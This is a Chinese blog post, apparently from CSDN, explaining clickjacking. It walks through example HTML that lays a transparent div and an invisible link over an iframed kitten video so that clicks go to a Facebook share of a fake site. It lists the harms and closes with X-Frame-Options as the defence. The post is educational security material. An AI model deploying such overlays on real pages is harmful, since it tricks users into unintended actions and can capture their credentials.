有趣的漏洞原理——点击劫持(可爱的小猫居然想要和你吹一瓶?)

最新推荐文章于 2024-05-17 17:28:18 发布
最新推荐文章于 2024-05-17 17:28:18 发布
阅读量357 收藏 1
点赞数
分类专栏: 常见漏洞原理 文章标签: html5 html php 点击劫持 漏洞原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LizePing_/article/details/120017762
版权

有趣的漏洞原理——点击劫持

环境介绍

点击劫持是一种通过将链接伪装成其他东西来诱使网站用户点击有害链接的方法。
点击劫持攻击诱使网络用户执行他们不打算执行的操作,通常是通过在用户认为他们正在执行的操作之上呈现一个不可见的页面元素。

网页里有个小猫的视频,点击它会正常开始播放视频

在这里插入图片描述

进入正题

假设你的代码是下面这样。

<html>
  <head>
    <style>
      body {
        position: relative;
        margin: 0;
      }

      iframe {
        border: none;
        position: absolute;
        width: 100%;
        height: 100%;
      }
    </style>
  </head>
  <body>
    <iframe src="www.kittens.com/vacuum-revenge">
    </iframe>
  </body>
</html>

一些黑客会利用相似的站点来伪装,比如
www.k1tt3ns.com/vacuum-revenge

搞定它

在页面上面加一个透明的div标签

..带有透明的 DIV 覆盖 ...
<html>
  <head>
    <style>
      body {
        position: relative;
        margin: 0;
      }

      iframe, div {
        border: none;
        position: absolute;
        width: 100%;
        height: 100%;
      }

      div {
        z-index: 100;
      }
    </style>
  </head>
  <body>
    <iframe src="www.kittens.com/vacuum-revenge">
    </iframe>
    <div></div>
  </body>
</html>
  • 再加上一个无形的链接,把要跳转的链接加进去
<html>
  <head>
    <style>
      body {
        position: relative;
        margin: 0;
      }

      iframe, div, a {
        border: none;
        position: absolute;
        width: 100%;
        height: 100%;
      }

      div {
        z-index: 100;
      }

      a {
        display: block;
      }
    </style>
  </head>
  <body>
    <iframe src="www.kittens.com/vacuum-revenge">
    </iframe>
    <div>
      &lt;a href=&quot;https://www.facebook.com/sharer/sharer.php?u=http%3A%2F%2Fwww.fakewebsite.com&quot;&gt;&lt;/a&gt;
    </div>
  </body>
</html>

这样如果再点击视频,攻击者就会将你带到各种神奇的地方。

比如:

在这里插入图片描述

危害!

通过在真实登录框之上渲染一个虚假登录框来获取登录凭据。 通过在 Adob​​e Flash
设置页面上呈现不可见元素,诱使用户打开他们的网络摄像头或麦克风。
在社交媒体网站上传播蠕虫。
通过诱骗人们点击他们原本不会点击的东西来宣传在线诈骗。 通过将用户转移到恶意下载链接来传播恶意软件。

如何预防!

  • X-Frame-Options
    在X-Frame-Options HTTP标头可以被用于指示浏览器是否应该被允许在渲染页面, 或标签。它专门设计用于帮助防止点击劫持。

标头有三个允许的值:

DENY 无论站点如何尝试,都无法在框架中显示该页面。
SAMEORIGIN 页面只能显示在与页面本身相同来源的框架中。
ALLOW-FROM uri 页面只能显示在指定来源的框架中。

在这里插入图片描述

征__程
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
WEB应用程序点击劫持漏洞研究及防御方法
12-11
web程序劫持漏洞及防御的方法。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
点击劫持漏洞
weixin_52501704的博客
02-07 3123
点击劫持漏洞学习
十四、点击劫持漏洞
weixin_46849264的博客
03-24 474
点击劫持漏洞
界面劫持点击劫持
d59hao的博客
06-13 607
界面操作劫持攻击实际上是一种基于视觉欺骗的 web 会话劫持攻击,核心在于使用了标签中的透明属性,他通过在网页的可见输入控件上覆盖一个不可见的框,使得用户误以为在操作可见控件,而实际上用户的操作行为被其不可见的框所劫持,执行不可见框中的恶意代码,达到窃取信息,控制会话,植入木马等目的。因为首先劫持的是用户的鼠标点击操作,所以命名叫点击劫持。最新版本的浏览器提供很多防御点击劫持漏洞的安全机制,对于普通的互联网用户,经常更新修复浏览器的安全漏洞,能够最有效的防止恶意攻击。
点击劫持漏洞原理和复现
weixin_54438700的博客
05-20 2931
一、漏洞原理 点击劫持(Clickbandit),主要是利用HTML中iframe便签可以透明的属性进行利用攻击,其原理是通过在原本的网页上覆盖透明的框架并使受害者在不知情的情况下进行点击漏洞主要是由于未对referer字段来源进行检验。常常配合csrf和xss。 图中,攻击者在原本网站上覆盖一个透明框架,受害者正常访问网站A,就会点击到这个透明框架B。攻击者常常利用该漏洞诱导受害者点击关键位置进行一些操作,比如转账、购买等危险操作。 二、漏洞复现 1.借助burpsuite工具,选择Clickb
点击劫持漏洞修复(前端、后端)
weixin_42787408的博客
09-30 2146
点击劫持是一种视觉上的欺骗手段,攻击者通过使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作。
点击劫持漏洞案例ppt
01-02
点击劫持---clickjacking
无需Root也能Hook?——Depoxsed框架演示
02-26
摘要:Xposed可以实现非侵入式的在运行期动态修改系统和应用行为的能力,但有着一个巨大的缺点,就是需要Root权限。本文作者介绍并演示了无需Root也能Hook的Alibaba开源框架Depoxsed方案。之前我们介绍过rovo89在...
Click Jacking点击劫持漏洞验证.pdf
12-25
本文详细讲解Click Jacking点击劫持漏洞原理及利用方式。该漏洞成功利用的关键就是能够将伪造的网页源码覆盖到目标页面上,并且在受害者不知情的情况下诱导进行操作,可将操作记录打印输出到控制台。攻击者也可通过...
移动开发构架漫谈——反劫持实战篇
02-25
DNS劫持又称域名劫持,是指在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则返回假的IP地址或者什么都不做使请求失去响应,其效果就是对特定的网络不能反应或访问的是假网址...
Web 安全之点击劫持(Clickjacking)攻击详解
路多辛的所思所想
01-27 1493
点击劫持(Clickjacking)攻击,又称为界面伪装攻击,是一种利用视觉欺骗手段进行攻击的方式。攻击者通过技术手段欺骗用户点击本没有打算点击的位置,当用户在被攻击者攻击的页面上进行操作时,实际点击结果被劫持,从而被攻击者利用。这种攻击方式利用了用户对网站的信任,通过覆盖层(通常是透明的iframe)覆盖在另一个网页之上,使受害者无法察觉。
【Web安全】点击劫持漏洞
做自己喜欢的事,并将其发挥到极致!
11-25 1266
本篇文章主要介绍点击劫持漏洞原理、危害以及验证方式,切勿将文中攻击手法用于非授权下渗透攻击行为!!!点击劫持(Click Jacking),是一种视觉上的欺骗手段,也被称为UI-覆盖攻击。攻击者通过使用一个透明的iframe,覆盖在一个网页上,然后诱使用户在该页面上进行操作,通过调整iframe页面的位置,可以使得伪造的页面恰好和iframe里受害页面里的一些功能重合(点击按钮或活动选项),以达到窃取用户信息或者劫持用户操作的目的。
点击劫持漏洞原理及利用包含修复建议
课嗨教育的专栏
01-12 3747
今天群里有人问如何查看是否存在点击劫持漏洞,我们首先了解下漏洞是如何产生的,点击劫持漏洞是因为网站未对referer来源进行验证导致的。 具体测试及利用的话我们可以用iframe制作一个透明标签在上面: 案例: <!DOCTYPE HTML> <html> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <head> <title>点击劫持<
漏洞解决方案-点击劫持
smart的博客
09-14 4670
漏洞解决方案-点击劫持前置知识修复方案代码参考 前置知识        点击劫持,clickjacking,也被称为UI-覆盖攻击。这个词首次出现在2008年,是由互联网安全专家罗伯特·汉森和耶利米·格劳斯曼首创的。        它是通过覆盖不可见的框架误导受害者点击。        虽然受害者
《WEB安全渗透测试》(35) 使用Burp Clickbandit测试点击劫持
午夜观星河
02-08 2103
点击劫持指的是,通过覆盖不可见的框架误导受害者点击,虽然受害者点击的是他所看到的网页,但其实他所点击的是被黑客精心构建的另一个置于原网页上面的透明页面。Burp Clickbandit 是用于生成点击劫持攻击的工具,当发现可能容易受到点击劫持的网页时,可以使用 Burp Clickbandit 发起攻击,并确认可以成功利用此漏洞。Burp Clickbandit 使用 JavaScript 在你的浏览器中运行,它适用于除 Microsoft IE 和 Edge 之外的所有现代浏览器。
html5】01-了解HTML5
最新发布
m0_68467925的博客
05-17 628
了解HTML5;引入HTML5目的;HTML5新特性;优缺点
nginx点击劫持漏洞修复
05-10
点击劫持是一种常见的 Web 安全漏洞,攻击者会将一个网站嵌入到另一个网站中,通过隐藏或者伪装的方式,欺骗用户去点击一个看似无害的链接,从而实现攻击者的恶意目的。nginx 本身并没有针对点击劫持的专门防御机制...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

征__程

多动手,避免老年痴呆,活跃身心

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值